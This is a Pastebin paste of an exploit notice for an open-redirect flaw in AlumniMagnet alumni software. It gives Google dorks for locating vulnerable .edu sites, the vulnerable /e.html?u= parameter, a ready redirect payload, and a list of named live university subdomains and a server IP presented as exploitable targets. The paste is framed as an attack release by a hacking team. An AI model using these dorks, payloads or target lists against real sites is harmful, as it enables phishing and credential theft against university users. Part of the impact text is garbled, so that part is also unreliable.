Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : AlumniMagnet Open Redirection
- # Author [ Discovered By ] : Hacker KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 26/03/2019
- # Vendor Homepage : alumnimagnet.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks :
- intext:Powered by AlumniMagnet site:edu
- inurl:/images.html?view_album= site:edu
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Impact :
- ***********
- AlumniMagnet - OmniMagnet Next-Gen Alumni Engagement Software accepts a user-controlled
- input that specifies a link to an external site, and uses that link in a Redirect.
- This simplifies phishing attacks. An http parameter may contain a URL value
- and could cause the web application to redirect the request to the specified URL.
- By modifying the URL value to a malicious site, an attacker may successfully
- launch a phishing scam and steal user credentials. Because the server name in the
- modified link is identical to the original site, phishing attempts have a more
- trustworthy appearance. Open redirect is a failure in that process that makes
- it possible for attackers to steer users to malicious websites. This vulnerability is
- used in phishing attacks to get users to visit malicious sites without realizing it.
- Web users often encounter redirection when they visit the Web site of a company
- whose name has been changed or which has been acquired by another company.
- Visiting unreal web page user's computer becomes affected by malware
- the task of which is to deceive the valid actor and steal his personal data.
- ####################################################################
- # Vulnerable File :
- ****************
- /e.html
- # Vulnerable Parameter :
- *********************
- ?u=
- # Open Redirection Exploit :
- **************************
- /e.html?u=https://www.[REDIRECTION-ADDRESS].gov
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- * Vulnerable IP Address => 207.171.2.237 => There are 200 domains hosted on this server
- [+] alumniandfriends.uiw.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
- [+] philadelphia.alum.wellesley.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
- [+] hcrussia.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
- [+] hcseattle.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
- [+] hcmaryland.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
- [+] hcresearchtriangle.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
- [+] hcmexico.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
- [+] officerslounge.clubs.harvard.edu/e.html?u=https://www.[REDIRECTION-ADDRESS].gov
- ####################################################################
- # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement